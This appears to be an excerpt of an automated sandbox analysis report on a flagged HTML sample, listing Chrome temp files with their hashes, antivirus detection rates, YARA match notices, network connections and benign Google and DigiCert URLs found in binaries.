C:\Users\user\AppData\Local\Temp\6008_2142786305\manifest.fingerprint	ASCII text, with no line terminators	C00BCE97F21B1AD61EB9B8CD001795EE	8E0392FF3DB267D847711C3F4E0D7468060E1535	59F06F04230E32E8BC839F45B984D31D611930427B631C963D09E7064A602363
C:\Users\user\AppData\Local\Temp\6008_2142786305\manifest.json	ASCII text	1863B86D0863199AFDA179482032945F	36F56692E12F2A1EFCA7736C236A8D776B627A86	F14E451CE2314D29087B8AD0309A1C8B8E81D847175EF46271E0EB49B4F84DC5
C:\Users\user\AppData\Local\Temp\6008_219198615\Recovery.crx3	Google Chrome extension, version 3	EA1C1FFD3EA54D1FB117BFDBB3569C60	10958B0F690AE8F5240E1528B1CCFFFF28A33272	7C3A6A7D16AC44C3200F572A764BCE7D8FA84B9572DD028B15C59BDCCBC0A77D
C:\Users\user\AppData\Local\Temp\6008_219198615\_metadata\verified_contents.json	ASCII text, with very long lines, with no line terminators	45821E6EB1AEC30435949B553DB67807	B3CADEB17FE5B76B5DBB428B8D3A07B341F8B1BC	E5FAE91295BECF7F66BFA4BE1061CA5537ED763EB5D01485F23ECFB583304FEE
C:\Users\user\AppData\Local\Temp\6008_219198615\manifest.fingerprint	ASCII text, with no line terminators	2AE14F91312C4E8034366B09D49D5B18	AD4933A5D838D0FA0B960C327A5039A9E8249642	4F122332EF0F2BB490EF59619D3602C1A7277C0A7A19C132202DB4803A09BFA2
C:\Users\user\AppData\Local\Temp\6008_219198615\manifest.json	ASCII text	7A8E3A0B6417948DF4D49F3915428D7A	4FC084AABDB13483567D5C417C7ED8FD16726A80	D1AC274CF1018020F2D9635A518ED1A1F21CC2CBE9E2A4392EC792D54B5B52FE
C:\Users\user\AppData\Local\Temp\6008_696798426\_metadata\verified_contents.json	ASCII text, with very long lines, with no line terminators	6D1D175F88B64546105E3E7C31D1129A	75A1B56F55BB62B05365A0FDBFC7941DE77CBFAF	A0BC246E8E160A9BB32FA60F4E7A04D148A17125F426509466031E07731FDF81
C:\Users\user\AppData\Local\Temp\6008_696798426\manifest.fingerprint	ASCII text, with no line terminators	C6ABF42CB5AF869629971C2E42A87FD5	6EB0FAE28D9466E76FA12E31FE6CDADD3ACCE4D1	D281AFDA759075F4CB7D7CEEC4A3CB2AF135213B4D691F27090E13F238486AD1
C:\Users\user\AppData\Local\Temp\6008_696798426\manifest.json	ASCII text	4AAA0ED8099ECC1DA778A9BC39393808	0E4A733A5AF337F101CFA6BEA5EBC153380F7B05	20B91160E2611D3159AD82857323FEBC906457756678AB73F305C3A1E399D18D
C:\Users\user\AppData\Local\Temp\6008_696798426\ssl_error_assistant.pb	data	E2F792C9E2DD86F39E8286B2EAD2FC70	8A32867614D2A23E473ED642056DED8E566687F9	AC354A4723AAA4F06BEC385DDDE4A4D0983AD51456F52B31A8068EC97D5B5EA7
C:\Users\user\AppData\Local\Temp\a0e2a87f-bf77-417d-9efe-cb150f92210e.tmp	very short file (no magic)	5058F1AF8388633F609CADB75A75DC9D	3A52CE780950D4D969792A2559CD519D7EE8C727	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\2f173533-4bef-4c06-a9ca-30c5c91e7848.tmp	Google Chrome extension, version 3	541F52E24FE1EF9F8E12377A6CCAE0C0	189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6	81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\bg\messages.json	UTF-8 Unicode text, with CRLF line terminators	6F8E288A9AD5B1ED8633B430E2B4D4CA	F671D3D4BEFA431D1946D706F4192D44E29B6F08	A114E2783D0E9B12155017323BA70838F0F82A71C7EE8DC1F115AE36991241F8
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\ca\messages.json	UTF-8 Unicode text, with CRLF line terminators	1FDAFC926391BD580B655FBAF46ED260	C95743C3F43B2B099FEBEBC5BD850F0C20E820AC	C67898B67F9C9209EAFDA6532B62D5789863CFB855998DD6A70E7775316CEC20
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\cs\messages.json	UTF-8 Unicode text, with CRLF line terminators	76DEC64ED1556180B452A13C83171883	CFB1E56FD587BCDC459C1D9A683B71F9849058F9	32290D69A90E6BAAC428B10382C99221B12773BB9A184F3B93DFB48A4F6D7A40
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\da\messages.json	UTF-8 Unicode text, with CRLF line terminators	238B97A36E411E42FF37CEFAF2927ED1	4E47AC90BA24C8F4724D9293FA40CFD4ADA66FE0	4977D4A053542FF66967FAED6B06585DD70E68E20BFEB533B66FE3287F9655D9
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\de\messages.json	UTF-8 Unicode text, with CRLF line terminators	6B3E916E8C1991AA0453CBA00FEDCAAA	D6366D15912E40CA107FD42BFE9579C3336A51F9	A62FFAB910E31531758EEE48B2CC71A8857BEC3021DEAD50B668CBA3C8667053
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\el\messages.json	UTF-8 Unicode text, with CRLF line terminators	05C437A322C1148B5F78B2F341339147	AB53003A678E44A170E73711FBD9949833BBF3AA	A052C32B4FCAC61152EB0ADB2C260FB6A8256AD104AA0013DB93E9798D41A070
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\en\messages.json	ASCII text, with CRLF line terminators	91F5BC87FD478A007EC68C4E8ADF11AC	D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6	92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\en_GB\messages.json	ASCII text, with CRLF line terminators	91F5BC87FD478A007EC68C4E8ADF11AC	D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6	92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\es\messages.json	UTF-8 Unicode text, with CRLF line terminators	82719BD3999AD66193A9B0BB525F97CD	41194D511F1ACC16C1CA828AC81C18C8C6B47287	4DB9B2721E625C18B9E05C04B31AF5D9694712F1CAAF6219ABE34BB08E5DB1C7
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\es_419\messages.json	UTF-8 Unicode text, with CRLF line terminators	6B2583D8D1C147E36A69A88009CBEBC7	4D4DEEB4BE6AA0181825F3371A761ABC5B4D5937	6659BC3705311D7641A73995DCFEA80C7734F2F4EBBC3787B3892A240348324F
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\et\messages.json	UTF-8 Unicode text, with CRLF line terminators	CFF6CB76EC724B17C1BC920726CB35A7	14ED068251D65A840F00C05409D705259D329FFC	C85800BF45942FCC7FD6B1DF929C25F9CC2A977A6678966BD03D4B6B69889AFD
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\fi\messages.json	UTF-8 Unicode text, with CRLF line terminators	3A01FEE829445C482D1721FF63153D16	F3EAAADDC03F943FC88B30B67F534AA13E3336DD	0BDE54B20845124113383B6EB81E43A0F05E4EB0C44BEE3C1DFAC4CC5FEC2836
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\fil\messages.json	ASCII text, with CRLF line terminators	57AF5B654270A945BDA8053A83353A06	EEEF7A4F869F97CF471A05D345E74F982D15E167	EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\fr\messages.json	UTF-8 Unicode text, with CRLF line terminators	8D11C90F44A6585B57B933AB38D1FFF8	3F9D44EA8807069A32AACA2AAAD02FD892E6CC90	599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\hi\messages.json	UTF-8 Unicode text, with CRLF line terminators	E376D757C8FD66AC70A7D2D49760B94E	1525C5B1312D409604F097768503298EC440CC4D	8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\hr\messages.json	UTF-8 Unicode text, with CRLF line terminators	8185D0490C86363602A137F9A261CC50	5BD933B874441CEACB9201CCC941FF67BAED6DC0	A2B2EC359A9DD9DCCCE02859CE1E738BD30FAA4A05F1DC522893FFDF722BBC15
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\hu\messages.json	UTF-8 Unicode text, with CRLF line terminators	85609CF8623582A8376C206556ED2131	1E16EB70DB5E59BB684866FF3E3925C2DEF25A12	32A249749F12ADB6A220BF9ADC272C7E5D9AD5497A38B0086D961E3ABA17FBC6
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\id\messages.json	ASCII text, with CRLF line terminators	EAB2B946D1232AB98137E760954003AA	60BDC2937905B311D2C9844DF2D639D7AC9F7F67	C6E8800450602DE0F39FE9F6854472383813FB454B08ABAE7E25A9167CE004C3
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\it\messages.json	UTF-8 Unicode text, with CRLF line terminators	A328EEF5E841E0C72D3CD7366899C5C8	2851ED658385804E87911643F5A4200B1FB26E13	CD891C45F7586FB4A2514205A11F260E4A6D4482FA03D901909DD9F57BE0536D
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\ja\messages.json	UTF-8 Unicode text, with CRLF line terminators	9B3A5D473C3F2BBFAEECE94A07A940B8	61BACA342CF766BBA15C7B4D892A0E7DAC9405AA	706312A4A2AEF3317223F141EB2B82685345B7EED444F16BB4DF3A272716DA1F
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\ko\messages.json	UTF-8 Unicode text, with CRLF line terminators	9F6B4D82A70C74CA751E2EAE70FAB5CF	0534F125FFCE8222277CF2BE3401C59DAF9217F8	D1467B8D037114403E8F4EFC52E88C4A7FEB96126BE4CFF883FEFF1084EF7E68
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\lt\messages.json	UTF-8 Unicode text, with CRLF line terminators	4CA644F875606986A9898D04BDAE3EA5	722A10569E93975129D67FBDB75B537D9D622AD1	7C311AB751D840D750C11553C083785813E079C1D464FE568A98C9E3EF3DB96C
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\lv\messages.json	UTF-8 Unicode text, with CRLF line terminators	C5CE2C51391EAFD3DA9E4C71549A3C28	1F67FF6EF6E90C0CE3AAF56ED543A3EFD381574D	1FA1DF2CA8516DEF490FB8484E9AA498ACFF80EEF5C9258FFE42D3678E6C7DED
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\nb\messages.json	UTF-8 Unicode text, with CRLF line terminators	93C459A23BC6953FF744C35920CD2AF9	162F884972103A08ADB616A7EB3598431A2924C5	2CD700AEB57D89C2E73333D0702556EE3FF3863516170F85669BC680FCBDC4E0
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\nl\messages.json	ASCII text, with CRLF line terminators	7A8F9D0249C680F64DEC7650A432BD57	53477198AEE389F6580921B4876719B400A23CA1	92BE7C2DC9CFBE5A65E9CE6488D364C8D7EC19E7B67A31E4D43C1CB2B169671C
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\pl\messages.json	UTF-8 Unicode text, with CRLF line terminators	0E6194126AFCCD1E3098D276A7400175	E8127B905A640B1C46362FA6E1127BE172F4A40F	E2699F98C511B18A2AFB82EAE9A4804B646C4FF1077D80E77C17A3943A6373C2
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\pt_BR\messages.json	UTF-8 Unicode text, with CRLF line terminators	86A2B91FA18B867209024C522ED665D5	63DEC245637818C76655E01FCB6D59784BC7184E	6374880FDD1F8AF1EE8AEA6A06B73BE0AB265AFCEB4FE6F08BDE3B3989264B21
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\pt_PT\messages.json	UTF-8 Unicode text, with CRLF line terminators	750A4800EDB93FBE56495963F9FB3B94	8BFB915488A4EB3CB33D68E2E59F1F8447DB7D61	C1C94F65FABAF17DEF98A8587711A56D61B1E5607500E9B01F2824DB109F9E83
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\ro\messages.json	UTF-8 Unicode text, with CRLF line terminators	98D43E4B1054A65DF3FA3CC40AB6FB6D	46E0A21C4DA2BB5D4D8F837AE211C1B6FA26E7E2	113A13900CBA62FE8AED06751971C23A80A99B47F9BE219CF884D57DB19611D9
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\ru\messages.json	UTF-8 Unicode text, with CRLF line terminators	DB2EDF1465946C06BD95C71A1E13AE64	FB4F3ECE9ECECEBBC6CA2A592A15FB9C1FDFB811	FBAF22CE6E16DE174CED8CB5EA3098CCA1C3426A2111FF33BD3E64DA64ED67AB
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\sk\messages.json	UTF-8 Unicode text, with CRLF line terminators	8DF215D1EFBDABB175CCDD68ED8DCB0A	2B374462137A38589A73FDD00A84CBDC7E50F9F4	7FA16AF97E6CFC52EC6008EB679D3F30E7E0C24F9EF2D18A9228EAF4DED9D63B
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\sl\messages.json	UTF-8 Unicode text, with CRLF line terminators	3943FA2A647AECEDFD685408B27139EE	0129DD19D28373359530B3B477FE8A9279DABB7D	18AFF072EE0DF7C3495045435C752A805606E6D5D462EF2321C443F1773F4B3A
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\sr\messages.json	UTF-8 Unicode text, with CRLF line terminators	D485DF17F085B6A37125694F85646FD0	24D51D8642CDC6EFD5D8D7A4430232D8CDE25108	7FFDE34C58E7C376C042DE64DEF6481DAE32BE8B70F0B18EDF536290CBE0C818
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\sv\messages.json	UTF-8 Unicode text, with CRLF line terminators	D372B8204EB743E16F45C7CBD3CAAF37	C96C57219D292B01016B37DCF82E7C79AD0DD1E8	B8BA77E0089B0676545EC16D32468B727812B444F90B33A7A5B748E6C36C4388
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\th\messages.json	UTF-8 Unicode text, with CRLF line terminators	83E2D1E97791A4B2C5C69926EFB629C9	429600425CB0F196DDD717F940E94DBD8BFF2837	2FECA577F43D97BAEEA464741D585892103585208FD0A935B810A03BDCE83C88
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\tr\messages.json	UTF-8 Unicode text, with CRLF line terminators	2CEAE0567B6BB1D240BBAD690A98CA3B	5944346FBD4A0797B13223895995CAB58E9ECD23	A7CB86F30C9C31FE5540282C308BA96ADB4EC16EF98C87129EB88105E5BEF5FC
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\uk\messages.json	UTF-8 Unicode text, with CRLF line terminators	AB0B56120E6B38C42CC3612BE948EF50	8B3F520E5713D9F116D68E71DAEED1F6E8D74629	68ABA284751EB9C856032062EF9B1651E2A1E5CE5FDA0977FFC97D63BA7BED9E
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\vi\messages.json	UTF-8 Unicode text, with CRLF line terminators	7EBB677FEAD8557D3676505225A7249A	F161B4B6001AEAEAB246FF8987F4D992B48D47BE	051F96ED874C11C4A13589B5F68964E4F5B03B52DDA223D56524F2CA23760C04
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\zh_CN\messages.json	UTF-8 Unicode text, with CRLF line terminators	BB73BF561BB79F89D9BF7C67C5AE5C65	2FADD3A1959B29C44830033A35C637D0311A8C9C	D804F2A040D21D7511EFD5213D8E1721D64964A1A0DBB48E21622CEEDC9D967E
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_locales\zh_TW\messages.json	UTF-8 Unicode text, with CRLF line terminators	5FF50C673CC0C661D615F0CFD0E6DCA0	60DFF98DEAB9C4746B288BDD9C94B3BCAE5EAA85	C6F8C640F3353A7B9B1432A0C139C1AEEC40133800E6C9B467B63991AD660308
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\_metadata\verified_contents.json	ASCII text, with very long lines, with no line terminators	0834821960CB5C6E9D477AEF649CB2E4	7D25F027D7CEE9E94E9CBDEE1F9220C8D20A1588	52A24FA2FB3BCB18D9D8571AE385C4A830FF98CE4C18384D40A84EA7F6BA7F69
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\craw_background.js	ASCII text, with very long lines	6EEBED29E6A6301E92A9B8B347807F5F	65DFB69B650560551110B33DCBA50B25E5B876DE	04CD9494B0ED83924DAD12202630B20D053D9E2819C8E826A386C814CC0A1697
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\craw_window.js	ASCII text, with very long lines	1709B6F00A136241185161AA3DF46A06	33DA7D262FFED1A5C2D85B7390E9DBC830CBE494	5721A4B3F8E09C869A629EFFD350B51C9D46F0AC136717D4DB6265C0EE6F9AC8
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\css\craw_window.css	ASCII text	67BF9AABE17541852F9DDFF8245096CD	A4AC74DD258E8E0689034FAA1B15A5C7C56DC3BB	10DFBD2D98950B79EE12F6B8E3885AABE31543048DE56AD4FC0A5E34D0D9D4EC
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\html\craw_window.html	HTML document, ASCII text	34A839BC40DEBC746BBD181D9EF9310C	8B4EAA74D31EED5B0BABA3CA5460201F6B10DA46	BB8742615E4CD996AE5D0200E443AE6A6F0B473255F03AFFDB8FB4660DE4554D
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\flapper.gif	GIF image data, version 89a, 30 x 30	398ABB308EEBC355DA70BCE907B22E29	CFFB77B8A1724B8F81D98C6D6AD0071D10162252	2B73533F47A99FFEA9CC405FFAFA9C4C53623F62487AEBFBA415945120B22040
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\icon_128.png	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	4DBC9F9E6F5A08D299BAC9E54DF07694	BB38F5DE34B1E0BE1109220BA55271087A4D9EA5	91C2718DD23B4356D71F88F6146868369033291086DF327534546DFA459BEB0E
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\icon_16.png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	FB9C46EA81AD3E456D90D58697C12C06	5FC450F7D73CCFAC8F0D818CB3392BA4D91B69DE	016CA659BA080E194FBFC0929602B16506ED60AA6019FAA51410C4FD93B583E8
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\topbar_floating_button.png	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	8803665A6328D23CC1014A7B0E9BE295	9DA6EE729D5A6E9F30658B8EC954710F107A641F	D5F9234DC36E7FFA85F35B2359A4F82276F8395EFA76E4553507EA990B27FC6C
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\topbar_floating_button_close.png	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	0599DFD9107C7647F27E69331B0A7D75	3198C0A5F34DB67F91A0035DBC297354CBC95525	131817CD9311C03DF22D769DD2AD7FA2E6E9558863A89F7E5E1657424031A937
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\topbar_floating_button_hover.png	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	7CB6B9DC1A30F63B8BD976924B75AD96	0C40B0C496D2F2B5F2021C117EC8610AC03AB469	721B7AAA9A42A54A349881615A12E3A26983ACA48E173FD2F66E66AA0D725735
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\topbar_floating_button_maximize.png	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	232CE72808B60CBE0F4FA788A76523DF	721A9C98C835D2CD734153BBE07833C6637ECD68	AFA4EA944CBDEC8543242E627EF46D5BFD3766DCAC664E7E50CDEEF2B352740C
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\images\topbar_floating_button_pressed.png	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	E0862317407F2D54C85E12945799413B	FA557F8F761A04C41C9A4BA81994E43C6C275DBB	5C10CE0589EB115600F77381130B70AE0B7B3752614D86D4C89E857658AA222B
C:\Users\user\AppData\Local\Temp\scoped_dir6008_762777196\CRX_INSTALL\manifest.json	ASCII text, with CRLF line terminators	01334FB9D092AF2AA46C4185E405C627	47AD3C0E82362FFE5B881DF8D71D6F79AB7F5796	F52714812D68C577A445169D11E84DF6751C2D6886BC429643072BB5D61C6C27

AV Detection

Source: nF0trs9UzA.html	Virustotal: Detection: 42%			Perma Link
Source: nF0trs9UzA.html	ReversingLabs: Detection: 35%

Exploits

Source: Yara match	File source: nF0trs9UzA.html, type: SAMPLE
Source: Yara match	File source: 0000000C.00000002.669283741.000002CBFCE90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.669847334.000002CBFD114000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Compliance

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\6008_2054561844\LICENSE.txt

Jump to behavior

Source:	Binary string: widevinecdm.dll.pdb source: widevinecdm.dll.0.dr
Source:	Binary string: widevinecdm.dll.pdb@ source: widevinecdm.dll.0.dr

Networking

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: Ruleset Data.0.dr	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr, Ruleset Data.0.dr	String found in binary or memory: www.facebook.com/ajax/ads/ equals www.facebook.com (Facebook)
Source: Filtering Rules.0.dr	String found in binary or memory: www.facebook.com0 equals www.facebook.com (Facebook)

Source: widevinecdm.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: pnacl_public_x86_64_pnacl_sz_nexe.0.dr, pnacl_public_x86_64_pnacl_llc_nexe.0.dr	String found in binary or memory: http://llvm.org/):
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: widevinecdm.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr	String found in binary or memory: https://accounts.google.com/MergeSession
Source: 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://apis.google.com
Source: pnacl_public_x86_64_crtend_o.0.dr, pnacl_public_x86_64_ld_nexe.0.dr	String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
Source: pnacl_public_x86_64_crtend_o.0.dr, pnacl_public_x86_64_ld_nexe.0.dr	String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
Source: 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json8.0.dr, manifest.json1.0.dr, manifest.json4.0.dr, manifest.json6.0.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: pnacl_public_x86_64_ld_nexe.0.dr	String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
Source: pnacl_public_x86_64_ld_nexe.0.dr	String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
Source: LICENSE.txt.0.dr	String found in binary or memory: https://creativecommons.org/.
Source: LICENSE.txt.0.dr	String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: 852c6bac-e52c-4c65-bdcf-2d6bef49cb3b.tmp.1.dr, 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://dns.google
Source: LICENSE.txt.0.dr	String found in binary or memory: https://easylist.to/)
Source: 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://fonts.googleapis.com
Source: 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://fonts.gstatic.com
Source: LICENSE.txt.0.dr	String found in binary or memory: https://github.com/easylist)
Source: craw_window.js.0.dr, craw_background.js.0.dr	String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://ogs.google.com
Source: craw_window.js.0.dr, manifest.json1.0.dr	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://play.google.com
Source: 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://r5---sn-h0jeln7l.gvt1.com
Source: 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.0.dr, manifest.json1.0.dr	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr	String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: widevinecdm.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://www.google.com
Source: manifest.json1.0.dr	String found in binary or memory: https://www.google.com/
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.0.dr	String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.0.dr	String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: craw_window.js.0.dr, craw_background.js.0.dr, 93111f39-a0bf-461c-9ac4-80bea82791b0.tmp.1.dr	String found in binary or memory: https://www.googleapis.com
Source: manifest.json1.0.dr	String found in binary or memory: https://www.googleapis.com/
Source: manifest.json1.0.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json1.0.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json1.0.dr	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json1.0.dr	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
